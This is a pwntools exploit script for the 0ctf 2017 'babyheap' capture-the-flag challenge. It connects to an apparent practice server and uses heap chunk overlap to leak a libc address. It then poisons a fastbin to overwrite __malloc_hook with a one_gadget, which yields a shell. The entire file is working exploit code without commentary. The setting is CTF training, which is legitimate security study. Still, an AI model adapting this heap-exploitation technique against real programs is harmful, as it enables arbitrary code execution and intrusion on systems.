from pwn import *
#p = process(['./0ctf_2017_babyheap'],env={"LD_PRELOAD":"./libc-2.23.so"})
p = remote("node3.buuoj.cn",26165)
elf = ELF('./0ctf_2017_babyheap')
libc = ELF("./libc-2.23.so")
def Allocate(size):
p.recvuntil('Command: ')
p.sendline('1')
p.recvuntil('Size: ')
p.sendline(str(size))
def Fill(idx,content):
p.recvuntil('Command: ')
p.sendline('2')
p.recvuntil('Index: ')
p.sendline(str(idx))
p.recvuntil('Size: ')
p.sendline(str(len(content)))
p.recvuntil('Content: ')
p.sendline(content)
def Free(idx):
p.recvuntil('Command: ')
p.sendline('3')
p.recvuntil('Index: ')
p.sendline(str(idx))
def Dump(idx):
p.recvuntil('Command: ')
p.sendline('4')
p.recvuntil('Index: ')
p.sendline(str(idx))
Allocate(0x10) #0
Allocate(0x10) #1
Allocate(0x80) #2
Allocate(0x10) #3
Allocate(0x68) #4
Allocate(0x10) #5
Fill(0,'a'*24+p64(0xb1))
Free(1)
Allocate(0xa0) #1
Fill(1,'b'*24+p64(0x91))
Free(2)
Dump(1)
mainarea88 = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
log.success(hex(mainarea88))
libcbase = mainarea88 - (0x7f9b47a14b78-0x7f9b47650000)
log.success(hex(libcbase))
malloc_hook = libcbase + libc.symbols['__malloc_hook']
log.success(hex(malloc_hook))
one_gadget = libcbase + 0x4526a
Free(4) #4
Fill(3,'c'*24+p64(0x71)+p64(malloc_hook-0x23))
Allocate(0x68) #2
Allocate(0x68) #4
Fill(4,'\x00'*0x13+p64(one_gadget))
Allocate(0x10)
p.interactive()